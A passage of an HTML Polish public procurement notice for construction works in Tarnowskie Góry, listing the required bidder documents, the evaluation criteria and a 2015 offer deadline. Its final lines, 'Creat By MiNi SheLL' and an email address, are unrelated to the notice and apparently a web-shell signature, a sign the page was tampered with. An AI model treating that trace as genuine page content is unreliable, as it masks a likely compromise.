<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony /Formularz Oferty/ (załącznik Nr 1 do SIWZ);
2. Oświadczenie, że wykonawca zapoznał się  z warunkami zamówienia i załączonym wzorem umowy oraz, że przyjmuje treść bez żadnych zastrzeżeń (zawarte w treści /Formularza Oferty/).
3. Listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informację o tym, że wykonawca nie należy do grupy kapitałowej - zgodnie z załącznikiem nr 6 do Formularza Oferty.
4. Pełnomocnictwo ustanowione do reprezentowania wykonawców ubiegających się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii potwierdzonej za zgodność z oryginałem notarialnie.
5. Kosztorys ofertowy, sporządzony w formie szczegółowej dla robót stanowiących przedmiot zamówienia.  Przez szczegółowy kosztorys ofertowy należy rozumieć kosztorys ofertowy sporządzony zgodnie z zasadami wynikającymi z rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z dnia 13.07.2001 r. w sprawie kosztorysowania obiektów i robót budowlanych, dla metody szczegółowej sporządzania kosztorysu ofertowego. Rozporządzenie nie jest aktem prawnym aktualnie obowiązującym, niemniej jednak Zamawiający wymaga sporządzenia szczegółowego kosztorysu ofertowego zgodnie z zasadami opisanymi w wyżej wskazanym rozporządzeniu. W przypadku stwierdzenia przez Wykonawcę braku możliwości skatalogowania danej pozycji kosztorysu, Wykonawca winien dokonać wyceny danego elementu przedmiaru robót w szczegółowym kosztorysie ofertowym na podstawie kalkulacji własnej (indywidualnej), którą winien załączyć do szczegółowego kosztorysu ofertowego jako jego integralną część. Szczegółowy kosztorys ofertowy winien zostać podpisany przez Wykonawcę i winien zostać załączony do formularza oferty w dwóch jednobrzmiących egzemplarzach (w przypadku zawarcia umowy z Wykonawcą, jeden egzemplarz zostanie wykorzystany na potrzeby realizacji przyszłej umowy - egzemplarza tego nie należy trwale łączyć z pozostałymi dokumentami oferty).
6. Oświadczenie o zobowiązaniu się do odpłatnego korzystania z usług świadczonych przez zamawiającego w zakresie między innymi: najmu lokalu, telefonu itp., według skalkulowanych stawek na podstawie ponoszonych kosztów przez Zamawiającego - zgodnie 
z załącznikiem nr 7 do Formularza Oferty.
7. W przypadku wniesienia wadium w postaci pieniężnej, należy dołączyć do oferty kopię potwierdzenia nadania przelewu.
8. W przypadku wniesienia wadium w postaci niepieniężnej, można je złożyć łącznie z ofertą (ale w oddzielnej kopercie, by nie było na stałe związane/połączone z ofertą) lub złożyć w siedzibie Zamawiającego pok. nr 202 (sekretariat czynny od poniedziałku do piątku od 7.00 do 15.00). Kserokopię tych dokumentów można dołączyć do oferty. 
9. Harmonogram rzeczowo-finansowy inwestycji.
UWAGA: Wykonawcy mogą składać wszystkie wykazy, informacje czy oświadczenia także na własnych drukach, pod warunkiem, że będą one opracowane według schematu druków załączonych do niniejszej SIWZ.
UWAGA: Ocena spełnienia warunków udziału wykonawców w przedmiotowym postępowaniu dokonywana będzie w  systemie 0 - 1 (zero - jedynkowym tj. /spełnia nie spełnia/); niespełnienie chociażby jednego z postawionych warunków z pkt 1 i pkt 2 niniejszego Rozdziału (XI) SIWZ, spowoduje wykluczenie wykonawcy z postępowania.
UWAGA: W przypadku przedstawienia przez wykonawcę, w celu wykazania spełnienia warunków, dokumentów, w których występuje waluta inna niż polska, w celu jej przeliczenia stosowany będzie:
- średni kurs NBP na dzień opublikowania ogłoszenia o zamówieniu w Dzienniku Urzędowy Unii Europejskiej, lub
- średni kurs NBP z pierwszego dnia roboczego po dniu opublikowania ogłoszenia w Dzienniku Urzędowym Unii Europejskiej, jeżeli dniem opublikowania jest sobota.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mtbstg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Międzygminne Towarzystwo Budownictwa Społecznego Sp. z o. o. 
ul. Towarowa 1 
42-600 Tarnowskie Góry.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2015 godzina 10:00, miejsce: Międzygminne Towarzystwo Budownictwa Społecznego Sp. z o. o. 
ul. Towarowa 1 
42-600 Tarnowskie Góry
sekretariat, pokój 203.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com